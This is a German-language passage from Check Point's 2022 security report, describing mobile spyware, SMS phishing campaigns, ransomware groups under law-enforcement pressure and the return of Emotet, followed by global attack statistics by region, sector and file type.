Pegasus zeichnet sich durch einen nahtlosen Zero-Click-Infektionsprozess, eine umstrittene Opferliste und ausgeklügelte Funktionen zur Datenexfiltration aus. Es ist daher nicht verwunderlich, dass es nicht mehr das einzige seiner Art ist. Gegen Ende des Jahres entdeckten Forscher einen weiteren Bedrohungsakteur im Bereich der mobilen Spyware für den privaten Sektor. Cytrox, ein in Nordmazedonien ansässiges Unternehmen, vertreibt eine Spyware namens Predator für iPhone, die die Ziele der Kunden über klickabre Links infiziert, die über WhatsApp verschickt werden. Je mehr über die Fähigkeiten der Malware bekannt wird, desto größer ist die Wahrscheinlichkeit, dass diese von den üblichen Bedrohungsakteuren und -gruppen übernommen werden. Die weite Verbreitung von mobiler Spyware und die Aufmerksamkeit, die dieser Bereich im Jahr 2021 auf sich gezogen hat, sind ein weiteres Indiz für die entscheidende Rolle, die Mobilgeräte in der Cyber-Bedrohungslandschaft spielen.

Im Laufe des Jahres haben wir beobachtet, dass Bedrohungsakteure erhebliche Anstrengungen unternommen haben, um die wichtigsten Social- Media-Konten wie Facebook und Telegram zu hacken. Dazu gehörte auch die Durchführung groß angelegter Angriffskampagnen, die darauf abzielten, sich Zugang zu Mobilgeräten zu verschaffen. Im August wurde festgestellt, dass ein neuer Android-Trojaner namens „FlyTrap“ seit März 2021 mindestens 10 000 Facebook- Konten in 144 Ländern kompromittiert hat, vor allem durch bösartige Anwendungen, die im Google Play Store erhältlich sind. Die Anwendungen wurden hochgeladen und schnell von der Plattform entfernt, waren aber später in App-Stores von Drittanbietern verfügbar. Die Angreifer nutzten WhatsApp auch, um eine modifizierte Version der App für Android- Geräte zu verbreiten, die den Trojaner „Triada“

installiert. Im Oktober entdeckten Forscher eine Fotobearbeitungsanwendung, die im Google Play Store angeboten wurde und Schadcode enthielt, der die Facebook-Anmeldedaten der Nutzer refasste und sie zur Durchführung von Werbekampagnen mit den Zahlungsinformationen des Opfers verwendete. Die App wurde von Tausenden von Nutzern heruntergeladen. Im November schließlich wurde eine neue Android- Malware namens „MasterFred“ bekannt, die gefälschte Login-Overlays verwendet, um Kreditkartendaten von Netflix-, Instagram- und Twitter-Nutzern zu stehlen.

Ein weiterer wichtiger Angriffsvektor, der im Jahr 2021 im Vordergrund stand, ist die Verbreitung von Malware über SMS-Nachrichten. SMiShing, kurz für SMS-Phishing, ist eine Phishing-Technik, die sich auf Mobilgeräte für die Verbreitung von Social Engineering stützt und SMS-Nachrichten als Angriffsvektor nutzt. Im April 2021 nahm das FluBot-Android-Botnet, das sich auf diese Technik stützt, seine Aktivitäten wieder auf, obwohl die Betreiber von der spanischen Polizei verhaftet wurden. Im September fügte das Botnet seinem Arsenal eine neue Methode hinzu, um Android- Geräte zu kompromittieren, und begann, eine gefälschte Nachricht über ein Sicherheitsupdate zu verbreiten, die vor einer FluBot-Infektion warnte. Die Infektion wird ausgelöst, sobald das Opfer auf die Schaltfläche „Sicherheitsupdate installieren“ klickt. Im November tauchte FluBot erneut in einer Kampagne auf, die auf finnische Nutzer abzielte. Nachdem der Angriffsvektor seine Effektivität in den Kampagnen von FluBot unter Beweis gestellt hatte, wurde SMiShing nach und nach von weniger qualifizierten Akteuren übernommen. Eine kürzlich von Check Point Research durchgeführte Untersuchung ergab beispielsweise, dass SMiShing-Angriffe im Iran sehr effektiv sind, obwohl die Tools der

K A P I T E L 3

https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/ https://blog.zimperium.com/flytrap-android-malware-compromises-thousands-of-facebook-accounts/ https://securityaffairs.co/wordpress/121434/mobile-2/modified-android-whatsapp-triada-trojan.html https://www.bleepingcomputer.com/news/security/photo-editor-android-app-still-sitting-on-google-play-store-is-malware/ https://www.bleepingcomputer.com/news/security/new-android-malware-targets-netflix-instagram-and-twitter-users/ https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/ https://www.cert.govt.nz/individuals/news-and-events/parcel-delivery-text-message-infecting-android-phones/ https://www.kyberturvallisuuskeskus.fi/en/be-aware-malware-spread-sms https://research.checkpoint.com/2021/smishing-botnets-going-viral-in-iran/

27CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 27CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Akteure im Allgemeinen von geringer Qualität sind. Diese Kampagnen nutzen SMiShing und geben sich gleichzeitig als wichtige Einrichtungen wie die iranische Regierung, das Justizsystem, Einkaufsportale und andere aus. Viele Warnungen vor dieser mittlerweile florierenden Angriffsmethode erschienen in den Nachrichten. Das Ausmaß der jüngsten Angriffswelle ist beispiellos, was angesichts des florierenden Marktes für Botnet-as-a-Service in Untergrundforen und auf Telegram-Kanälen nicht überrascht. Phishing-Kits sind zu Preisen zwischen 50 und 100 USD erhältlich. Wir gehen davon aus, dass ähnliche Kampagnen, die auch durch den erfolgreichen Einsatz von SMiShing durch FluBot inspiriert wurden, bald auch in anderen Ländern durchgeführt werden könnten.

Eine weiterer umfangreicher Angriff, der im Jahr 2021 stattfand und sich um SMS-Nachrichten drehte, ist „UltimaSMS“, eine massive Kampagne, bei der rund 150 Android-Anwendungen eingesetzt wurden. Mit mehr als 10 Millionen Downloads aus dem Google Play Store besteht der Trick darin, die Opfer ohne ihr Wissen zu einem Abonnement von Premium-SMS-Diensten zu verleiten.

Schließlich wirken sich auch die durch die globale Pandemie verursachten systematischen

Veränderungen auf den Bereich der Mobile- Banking-Malware aus. Die zunehmende Digitalisierung des Bankensektors im Jahr 2021 hat dazu geführt, dass verschiedene Anwendungen aufgetaucht sind, die Offline- Interaktionen einschränken sollen, was wiederum zur Verbreitung neuer Bedrohungen geführt hat. Im September entdeckte Check Point Research eine neue Angriffsmethode gegen Android- Benutzer, die die Bedienungshilfen des Geräts missbraucht. Ziel des Angriffs waren Nutzer von PIX, einer seit einem Jahr bestehenden, aber äußerst beliebten Lösung für Sofortzahlungen, die von der brasilianischen Zentralbank entwickelt und verwaltet wird. Die Kampagne umfasste zwei Varianten von Banking-Malware, die über zwei bösartige Anwendungen im Google Play Store verbreitet wurden. Die PixStealer genannte Malware missbraucht die Accessibility Services (AAS) von Android, um über PIX- Transaktionen Geld von einer bestimmten Bank zu stehlen. Diese minimalistische, aber innovative Kombination von Funktionen ermöglicht es der Malware, Gelder zu stehlen, ohne mit einem C&C- Server zu interagieren, was ihr hilft, unentdeckt zu bleiben. Aufgrund seiner Einfachheit und Effizienz können wir davon ausgehen, dass andere Bedrohungsakteure diesem Beispiel folgen werden.

K A P I T E L 3

https://www.iribnews.ir/fa/news/3181066/%DA%A9%D9%84%D8%A7%D9%87%D8%A8%D8%B1%D8%AF%D8%A7%D8%B1%DB%8C-%D8%A7%D8%B2-%D8%B7%D8%B1%DB%8C%D9%82-%D8%A7%D8%B1%D8%B3%D8%A7%D9%84-%D9%BE%DB%8C%D8%A7%D9%85%DA%A9-%D8%AC%D8%B9%D9%84%DB%8C-%D8%A8%D8%A7-%D9%86%D8%A7%D9%85-%D8%B3%D8%A7%D9%85%D8%A7%D9%86%D9%87-%D8%AB%D9%86%D8%A7 https://blog.avast.com/premium-sms-scam-apps-on-play-store-avast https://research.checkpoint.com/2021/pixstealer-a-new-wave-of-android-banking-trojans-abusing-accessibility-services/

28CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 28CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Dies war ein turbulentes Jahr für mehrere Ransomware-Gruppen, nicht zuletzt, weil Regierungen und Strafverfolgungsbehörden ihre Haltung gegenüber organisierten Bedrohungsakteuren geändert haben. Sie gingen von koordinierten und reaktiven Maßnahmen zu proaktiven, offensiven Operationen über, die auf die Ransomware- Betreiber selbst sowie auf deren Geldmittel und unterstützende Infrastruktur abzielten. Die entscheidende Wende kam nach dem Colonial Pipeline-Vorfall im Mai, bei dem ein Angriff mit der DarkSide-Ransomware zu einer großen Treibstoffknappheit an der gesamten Ostküste der USA führte, so dass die Regierung Biden erkannte, dass sie ihre Bemühungen zur Bekämpfung der Bedrohung verstärken musste.

Die Betreiber der Ransomware sind das Rückgrat der gesamten Operation und bieten nicht nur die Ransomware selbst, sondern auch Geldwäschedienste und Verhandlungsspezialisten an. Die verschiedenen Ransomware-Programme konkurrieren um Partner, so dass Ransomware-Gruppen ständig attraktivere Tools und Dienste für ihre Partnerprogramme entwickeln, um sich in der konkurrierenden Untergrundgemeinschaft hervorzuheben. Der Ruf ist ein wichtiger Beweggrund, denn er kann die Chancen einer Gruppe auf hohe Gewinne beeinflussen oder sogar zur Ergreifung durch die Behörden führen. Es ist daher nicht verwunderlich, dass Cyberkriminelle ihre internen Streitigkeiten in Gerichtsforen austragen, wo ein verlorener Fall eine Gruppe ihren Ruf und ihre Gewinne kosten kann.

RISSE IM RANSOMWARE-ÖKOSYSTEM Vorbei sind die Zeiten, in denen Ransomware-Betreiber ein Lösegeld von 200 US-Dollar für Ihre Familienfotos aushandelten. Die heutige Ransomware-Ökonomie ist eine komplexe Struktur, die Millionen von Dollar pro Lösegeldforderung erpresst und ganze Unternehmen unter der Androhung der totalen Systemabschaltung gefangen hält. Die Entwicklung des Ransomware-Geschäftsmodells ist der Kern dieses Phänomens. Ransomware-as-a-Service (RaaS) führt Partnerprogramme mit geringen Einstiegskosten ein, so dass Angreifer sich dem Trend leicht anschließen können. Der Angreifer wählt eines der führenden Ransomware-„Projekte“ aus und folgt dem detaillierten, leicht verständlichen, kostenlosen Handbuch, das vollständige Anweisungen für jede Phase des Angriffs enthält. Wenn der Angriff erfolgreich war, teilen sich die Betreiber der Ransomware und ihre Partner das vom Opfer gezahlte Lösegeld. Diese äußerst profitable Methode ermöglicht es den Angreifern, einen größeren Kreis von Opfern zu erreichen und bietet allen Beteiligten höhere Gewinne.

K A P I T E L 3

https://www.zdnet.com/article/colonial-pipeline-ransomware-attack-everything-you-need-to-know/ https://threatpost.com/scammers-cybercrime-court/176834/ https://www.bleepingcomputer.com/news/security/translated-conti-ransomware-playbook-gives-insight-into-attacks/

29CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 29CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Im November führte eine internationale gemeinsame Operation unter der Leitung von Interpol mit dem Namen „Operation Cyclone“ zur Beschlagnahmung von Infrastrukturen und zur Verhaftung von Partnern bei der Geldwäsche von Cl0p, der Gruppe, die für den Angriff auf Accellion verantwortlich war und von der zahlreiche doppelte und dreifache Erpressungen ausgingen. Darüber hinaus haben das US-Justizministerium und andere Bundesbehörden weitere Maßnahmen gegen REvil ergriffen. Zu diesen Maßnahmen gehörten die Verhaftung von Mitgliedern, die Beschlagnahme von Lösegeldern im Wert von 6 Millionen US-Dollar, die Beschlagnahme von Geräten und ein Kopfgeldprogramm in Höhe von 10 Millionen US-Dollar.

Die Reaktionen auf diese Entwicklungen waren innerhalb des Ransomware-Ökosystems sehr unterschiedlich. Einige Gruppen zeigten sich feindselig und übten noch mehr Druck auf ihre Opfer aus, um die Behörden von ihren Geschäften fernzuhalten. Die Autoren der Grief Ransomware drohten beispielsweise damit, die Dechiffrierschlüssel ihrer Opfer vollständig zu löschen, falls diese professionelle Vermittler engagieren. In ähnlicher Weise stellte RagnarLocker alle gestohlenen Inhalte von Opfern online, die sich an das FBI oder andere Strafverfolgungsbehörden gewandt hatten.

Andere Gruppen scheinen sich angepasst und umbenannt zu haben, um nicht zu sehr mit einem prominenten Angriff in Verbindung gebracht zu werden. Darkside zum Beispiel hat sich vorübergehend aus dem Bereich Ransomware zurückgezogen und zumindest einige seiner Mitglieder haben sich im Juli in BlackMatter umbenannt. Sie führten Angriffe auf den Marketingdienstleister Marketron,

Später im selben Monat kündigte DarkSide an, dass es seinen Betrieb einstellen werde, nachdem seine Server beschlagnahmt und sein Vermögen an Kryptowährung, das zur Bezahlung von Partnern des Ransomware- as-a-Service-Programms verwendet wurde, gestohlen wurde. Im Juni stufte das US- Justizministerium (DOJ) Ransomware als Bedrohung der nationalen Sicherheit ein und setzte sie auf die gleiche Prioritätsstufe wie Terrorismus. Der nächste größere Vorfall betraf den Datenverlust der Kaseya MSP-Plattform nach dem die Täter von REvil auf mysteriöse Weise verschwanden, ihre Website „Happy Blog“ offline nahmen und offenbar auch ihren Kundensupport einstellten. Die Abschaltung war jedoch nur von kurzer Dauer und die Gruppe tauchte im September wieder auf. Dann verschwand sie im Oktober wieder, nachdem die Strafverfolgungsbehörden mutmaßlich erfolgreich ihre Infrastruktur und ihren „Happy Blog“ gekapert hatten.

Im September ging die Regierung Biden in ihrem Kampf gegen Ransomware noch einen Schritt weiter und kündigte an, Krypto-Börsen, -Wallets und -Händler zu sanktionieren, die von Ransomware-Akteuren genutzt werden, um Lösegeldzahlungen in verfügbares Vermögen umzuwandeln. Die in Russland ansässige Börse SUEX war die erste, die wegen ihrer Beteiligung an Lösegeldtransaktionen auf die Sanktionsliste gesetzt wurde. Im darauffolgenden Monat kündigten die Europäische Union und weitere 31 Länder an, sich den Bemühungen anzuschließen, weitere Kryptowährungskanäle zu auszuschalten, um Geldwäsche zu vereiteln. Darüber hinaus hat die australische Regierung ihren„Ransomware Action Plan“ veröffentlicht, der die Bildung einer neuen Sondereinheit und härtere Strafen für Ransomware-Akteure vorsieht.

K A P I T E L 3

https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/ https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/ https://www.theregister.com/2021/09/15/grief_corp_ransomware_negotiator_rage/ https://www.bleepingcomputer.com/news/security/ransomware-gang-threatens-to-leak-data-if-victim-contacts-fbi-police/ https://www.bankinfosecurity.com/blogs/blackmatter-ransomware-appears-to-be-spawn-darkside-p-3075 https://www.bankinfosecurity.com/blackmatter-knocks-marketron-off-air-a-17588 https://www.hackread.com/darkside-ransomware-quits-bitcoin-servers-seize/ https://www.hackread.com/darkside-ransomware-quits-bitcoin-servers-seize/ https://www.reuters.com/technology/exclusive-us-give-ransomware-hacks-similar-priority-terrorism-official-says-2021-06-03/ https://www.zdnet.com/article/updated-kaseya-ransomware-attack-faq-what-we-know-now/ https://heimdalsecurity.com/blog/revil-ransomwares-servers-have-resurfaced-after-being-down-for-two-months/ https://techcrunch.com/2021/10/18/revil-ransomware-group-goes-dark-after-its-tor-sites-were-hijacked/ https://gizmodo.com/biden-administration-reportedly-plans-sanctions-to-co-1847697017 https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210921 https://www.wsj.com/articles/white-house-ransomware-summit-eyes-tighter-global-scrutiny-for-crypto-11634227377 https://www.homeaffairs.gov.au/about-us/our-portfolios/cyber-security/strategy/australias-ransomware-action-plan

30CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 30CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Gemeinschaft unter dem Druck zusammenbrach oder sogar ihr Geschäft ganz aufgab. So trat die Avaddon-Gruppe erstmals im Juni 2020 in Erscheinung, sah sich aber nur ein Jahr später gezwungen, ihre Tätigkeit einzustellen und Dechiffrierschlüssel herauszugeben, was zweifellos auf die verstärkte Kontrolle durch die Strafverfolgungsbehörden zurückzuführen ist. In einem anderen Fall zielte die Conti- Ransomware auf die britische Firma Graff Jewelry ab, entschuldigte sich aber später, nachdem bekannt wurde, dass einige der gestohlenen Daten den königlichen Familien von Saudi-Arabien, den Vereinigten Arabischen Emiraten und Katar gehörten. Aus Angst vor Vergeltungsmaßnahmen versprachen sie, die Daten ohne Überprüfung zu löschen. Große Cybercrime-Foren haben jegliche Ransomware- Werbung von ihrer Plattform verbannt, um keine Aufmerksamkeit zu erregen. Dadurch wurde es für die Betreiber schwieriger, effektiv mit ihren Partnern zu kommunizieren, was das Risiko, erwischt zu werden, noch erhöhte.

Proaktive Maßnahmen und offensive Operationen von Regierungen auf der ganzen Welt haben das Ransomware-Ökosystem empfindlich gestört, die Verbreitung von Ransomware verhindert und in der Szene Unruhe gestiftet. Trotzdem werden Millionen von Dollar an potenziellen Einnahmen wahrscheinlich zu weiteren Ransomware- „Projekten“ im Jahr 2022 führen, wobei erfolgreiche Projekte als Modell für kommende und verbesserte Angriffe dienen werden. Eine Erkenntnis, die die Ransomware-Betreiber aus den Ereignissen des Jahres 2021 ziehen können, ist, dass die Art der Ziele, die sie auswählen, den Unterschied zwischen einem langfristigen oder sehr kurzen Betrieb ausmachen kann.

das japanische Technologieunternehmen Olympus und kritische Infrastrukturen wie die Landwirtschaftsorganisation New Cooperative in Iowa durch. Diese Umbenennung war jedoch nur von kurzer Dauer, denn im November gab BlackMatter bekannt, aufgrund des Drucks der Behörden seine Tätigkeit einzustellen. Sie gaben sogar bekannt, dass ihre Mitglieder „aufgrund der neuesten Entwicklungen nicht länger zur Verfügung“ stünden. Experten gehen jedoch davon aus, dass dieser Ausstieg aufgrund mangelnden Vertrauens in ihre Partner erfolgte, das auf eine fehlerhafte Verschlüsselung zurückzuführen ist, die es einem Sicherheitsunternehmen ermöglichte, die Dateien der Opfer zu entschlüsseln. Als letzte Handlung im Untergrund ist BlackMatter kurz vor seinem Verschwinden eine Partnerschaft mit der LockBit Ransomware eingegangen und hat seine Opfer auf die LockBit-Plattform übertragen, um eine nahtlose Fortsetzung der Erpressung zu ermöglichen.

Leider zeigten sich nicht alle Ransomware- Gruppen in ähnlicher Weise kooperativ. Die Angst, von den Behörden gefasst zu werden, führte zu einem ausgeprägten Misstrauen, das durch den ständigen Wettbewerb gefördert wurde. So wurden die Betreiber von REvil dabei ertappt , wie sie ihre Partner betrogen, indem sie die Lösegeldverhandlungen unterwanderten, mit mehreren Beteiligten Verhandlungen führten und Hintertüren verwenden, um sie um ihre Anteile zu bringen. Die Conti-Gruppe geriet in eine interne Krise, nachdem ein verärgerter Partner die Strategie von Conti durchsickern ließ und sich über die niedrigen Vergütungen beschwerte.

Schließlich gab es im vergangenen Jahr auch Anzeichen dafür, dass die Ransomware-

K A P I T E L 3

https://blog.malwarebytes.com/ransomware/2021/06/another-one-bites-the-dust-avaddon-ransomware-group-shuts-down-operation/ https://www.dailymail.co.uk/news/article-10172879/Russian-cyber-hackers-carried-virtual-heist-jewellers-Graff-make-grovelling-apology.html https://latesthackingnews.com/2021/05/17/cybercrime-forums-xss-exploit-raidforums-ban-ransomware-ads https://threatpost.com/blackmatter-ransomware-olympus/169423/ https://www.zdnet.com/article/iowa-farm-services-provider-hit-with-blackmatter-ransomware-and-5-9-million-ransom/ https://therecord.media/blackmatter-ransomware-says-its-shutting-down-due-to-pressure-from-local-authorities/ https://therecord.media/free-decrypter-announced-for-past-blackmatter-ransomware-victims/ https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/ https://threatpost.com/revil-affiliates-leadership-cheated-ransom-payments/174972/ https://www.bankinfosecurity.com/conti-ransomware-threat-rising-as-group-gains-affiliates-a-17448

31CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

K A P I T E L 4

MALWARE IM RAMPENLICHT: DIE RÜCKKEHR VON EMOTET

04

EMOTET, EINES DER GEFÄHRLICHSTEN UND BERÜCHTIGTSTEN BOTNETS DER GESCHICHTE, IST WIEDER DA, TROTZ DER LANGEN UND ABGESTIMMTEN BEMÜHUNGEN DER INTERNATIONALEN GEMEINSCHAFT UND DER STRAFVERFOLGUNGSBEHÖRDEN AUF DER GANZEN WELT, DIE IM JANUAR 2021 ZU SEINER AUSSCHALTUNG FÜHRTEN.

32CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 32CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Emotet, eines der gefährlichsten und berüchtigtsten Botnets der Geschichte, ist wieder da, trotz der langen und abgestimmten Bemühungen der internationalen Gemeinschaft und der Strafverfolgungsbehörden auf der ganzen Welt, die im Januar 2021 zu seiner Ausschaltung führten. Emotet, der Banken-Trojaner, der sich in ein modulares Botnetverwandelt hat,ist bekannt für seine enorme Reichweite von über 1,5 Millionen infizierten Computern weltweit in Tausenden von kompromittierten Unternehmensnetzwerken. Emotet wurde als Verbreitungsplattform genutzt, um andere berüchtigte Malware-Familien wie TrickBot, Qbot und Dridex zu verbreiten, was oft zu netzwerkweiten Ransomware-Angriffen führte, die ganze Unternehmen lahmlegten. Der entstandene Schaden wurde auf rund 2,5 Milliarden US-Dollar geschätzt, bevor es zwangsweise stillgelegt wurde.

A L E X A N D R A G O F M A N Team Leader,

Check Point Research

K A P I T E L 4

Gegen Ende des Jahres kam die Welt zu der Erkenntnis, dass selbst eine internationale Task Force Emotet beeinträchtigen, aber nicht vollständig ausschalten konnte.

Zumindest einige Mitglieder der Gruppe konnten sich der Justiz entziehen und haben die Zeit genutzt, um sich neu zu organisieren, neu zu gruppieren und ihre alten Verbindungen im Untergrund zu nutzen, um eine neue und verbesserte globale Spam-Kampagne zu starten.

Trickbot und Emotet sind langjährige Partner, so dass es in vielerlei Hinsicht nicht überraschend war, dass Emotet den Dienst von TrickBot als Dropper für seine eigene Wiederbelebung nutzen würde.“

https://www.europol.europa.eu/media-press/newsroom/news/world%e2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action https://securelist.com/the-chronicles-of-emotet/99660/ https://www.wired.com/story/emotet-botnet-takedown/

33CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 33CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Am 14. November ist Emotet offiziell zu neuem Leben erwacht, da zum ersten Mal seit seiner Stilllegung aktiver Code entdeckt wurde. Die Wiederauferstehung von Emotet kam aus einer überraschenden Quelle: Das TrickBot-Botnet wurde genutzt, um Teile von Emotet auf Rechnern abzulegen, die mit der TrickBot-Malware infiziert waren. Bereits am nächsten Tag kehrte Emotet zu seiner charakteristischen Verbreitungsmethode zurück und verbreitete sich in massiven Spam-Kampagnen über bösartige Dokumentanhänge. Um ihr Netzwerk wieder aufzubauen, entschieden sich die Betreiber von Emotet dafür, ihren Spam-Bot auf erfolgreich infizierten Rechnern abzusetzen, eine Methode, die es ihnen ermöglichte, die Malware an noch mehr potenzielle Ziele zu verteilen.

TrickBot als Dropper war dank der langjährigen Zusammenarbeit eine naheliegende Wahl für die Wiederbelebung von Emotet. Dies könnte sogar darauf hindeuten, dass zumindest einige seiner alten Partner ebenfalls an seiner Wiederauferstehung beteiligt sind. TrickBot selbst wurde im Jahr 2020 kurzzeitig vom Netz genommen, hielt sich jedoch hartnäckig und war in den Rankings der Top-Malware-Familien vom Mai, Juni und September 2021 vertreten. Im letzten Jahr hat Check Point Research weltweit über 140.000 TrickBot-Opfer ausgemacht. Dabei waren über 200 Kampagnen und Tausende von kompromittierten Netzwerken beteiligt. Diese breite Installationsbasis macht TrickBot zur perfekten Plattform, um das neue Botnet von Emotet wieder in Gang zu setzen.

Emotet selbst kehrte mit neuen Funktionen sogar stärker als zuvor zurück. Die aktualisierte Variante verwendet Elliptische-Kurven-Kryptografie anstelle von RSA- Kryptografie, verbesserte die Techniken zur Verflachung des Kontrollflusses und fügte seinen ursprünglichen Verbreitungsmethoden die Verwendung von bösartigen Windows- App-Installationspaketen hinzu, die sich als legitime Software ausgeben. Außerdem fanden die Forscher heraus, dass Emotet nun zum ersten Mal Cobalt Strike-Beacons direkt abwirft, anstatt Malware-Familien dazwischenzuschalten, die ihrerseits nach einiger Zeit Cobalt Strike-Beacons abwerfen würden. Cobalt Strike war in den vergangenen Jahren der Eckpfeiler gezielter Ransomware-Angriffe, und diese bedauerliche Entwicklung bedeutet, dass die Zeitspanne zwischen der ersten Emotet-Infektion und einem ausgewachsenen Ransomware-Angriff noch kürzer geworden ist, so dass den Verteidigern viel weniger Zeit bleibt, um auf einen laufenden Angriff zu reagieren.

Seit seiner Rückkehr beobachtete Check Point Research, dass die Aktivitäten von Emotet bei mindestens 50% der Aktivitäten im Januar 2021 unmittelbar vor seiner Stilllegung betragen. Dieser Aufwärtstrend setzte sich im Dezember mit mehreren Kampagnen zum Jahresende fort und wird voraussichtlich bis weit in das Jahr 2022 hinein anhalten, zumindest bis zum nächsten Versuch der Stilllegung.

K A P I T E L 4

https://cyber.wtf/2021/11/15/guess-whos-back/ https://isc.sans.edu/diary/28044 https://intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts https://blog.checkpoint.com/2021/06/10/check-point-softwares-may-2021-most-wanted-malware-dridex-drops-from-list-while-trickbot-rises-to-top/ https://blog.checkpoint.com/2021/07/13/june-2021s-most-wanted-malware-trickbot-remains-on-top/ https://blog.checkpoint.com/2021/10/08/september-2021s-most-wanted-malware-trickbot-once-again-tops-the-list/ https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/ https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/

34CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

K A P I T E L 5

GLOBALE STATISTIKEN 05

IM JAHR 2021 IST DIE ZAHL DER ANGRIFFE AUF UNTERNEHMENSNETZWERKE PRO WOCHE IM VERGLEICH ZU 2020 UM 50 % GESTIEGEN.

35CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 35CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

GLOBAL

AMERIKA

KATEGORIEN VON CYBER-ANGRIFFEN NACH REGION

Abbildung 1: Prozentsatz der Unternehmensnetzwerke weltweit, die von jedem Malware-Typ angegriffen werden.

Abbildung 2: Prozentsatz der Unternehmensnetzwerke in Amerika, die von jedem Malware-Typ angegriffen werden.

31%

21%

19%

19%

14%

8%

BOTNET

INFOSTEALER

CRYPTOMINERS

BANKING

MOBILE

RANSOMWARE

BOTNET

INFOSTEALER

CRYPTOMINERS

BANKING

MOBILE

RANSOMWARE

25%

18%

15%

15%

14%

6%

35CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

36CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

KATEGORIEN VON CYBER-ANGRIFFEN NACH REGION

EMEA

APAC

Abbildung 3: Prozentsatz der Unternehmensnetzwerke in EMEA, die von jedem Malware-Typ angegriffen werden.

Abbildung 4: Prozentsatz der Unternehmensnetzwerke in Asien-Pazifik, die von jedem Malware-Typ angegriffen werden.

BOTNET

INFOSTEALER

CRYPTOMINERS

BANKING

MOBILE

RANSOMWARE

30%

23%

19%

19%

14%

8%

BOTNET

INFOSTEALER

CRYPTOMINERS

BANKING

MOBILE

RANSOMWARE

43%

30%

25%

25%

13%

10%

36CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

37CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 37CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

GLOBALE BEDROHUNGSINDE XK ARTE

Abbildung 5: Globale Bedrohungsindexkarte

Die Karte zeigt den globalen Cyber-Bedrohungs-Risiko-Index, der die Hauptrisikobereiche weltweit aufzeigt.*

* Dunkler = höheres Risiko * Grau = Unzureichende Daten

K A P I T E L 5

38CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 38CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

1605 (+75%)Education / Research Government / Military

Communications

ISP / MSP

Healthcare

SI / VAR / Distributor

Utilities

Manufacturing

Finance / Banking

Insurance / Legal

Leisure / Hospitality

Consultant

Software Vendor

Retail / Wholesale

Transportation

Hardware Vendor

1136 1079 1068

830 778

736 704 703

636 595

576 536

526 501

367

(+47%)

(+51%)

(+67%)

(+71%)

(+18%)

(+46%)

(+41%)

(+53%)

(+68%)

(+40%)

(+73%)

(+146%)

(+39%)

(+34%)

(+16%)

Abbildung 6: Durchschnittliche wöchentliche Angriffe pro Unternehmen nach Branche im Jahr 2021 im Vergleich zu 2020.

Im Jahr 2021 haben die weltweiten Cyberangriffe auf Unternehmensnetzwerke im Vergleich zu 2020 um 50 % zugenommen. Die Kategorie „Bildung/Forschung“ ist mit durchschnittlich 1.605 Angriffen pro Organisation und Woche (Anstieg um 75 %) der am häufigsten angegriffene Sektor, während die Kategorie „Softwareanbieter“ mit einem Anstieg von 146 % im Vergleich zum Vorjahr den größten Zuwachs verzeichnet. Die Zunahme der Angriffe auf Softwareanbieter geht Hand in Hand mit dem im Jahr 2021 beobachteten Trend zu Angriffen auf die Software-Lieferkette.

K A P I T E L 5

39CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 39CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

DIE HEIMTÜCKISCHSTEN DATEIT YPEN – WEB VS. E-MAIL

Abbildung 7: Web – Die bösartigsten Dateitypen.

Abbildung 8: Email – Die bösartigsten Dateitypen.

ex e

pd f

do c xls xls

x jar ba t

do cx ps

1 ap

k ot

he r

52%

20%

5% 3% 3% 2% 2% 1% 1% 1%

10%

ex e

xlx s

pd f rtf do

c xls

m do

cx xls xls b

pp t

ot he

r

34%

16%

9% 7% 7% 6% 6% 5%

3% 2%

6%

K A P I T E L 5

40CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022 40CHECK POINT SOF T WARE | SICHERHEITSBERICHT 2022

Abbildung 9: Vertriebswege – E-Mail vs. Web als Angriffsvektoren in den Jahren 2019 bis 2021.

64%

36%

83%

17%

84%

16%

EMAIL WEB

2019 2020 2021

Die obigen Diagramme zeigen, dass sich der Angriffsvektor E-Mail stetig als Favorit etabliert hat, während die Nutzung von Websites zur Verbreitung von Malware-Nutzdaten seit Anfang 2020 langsam abnimmt.

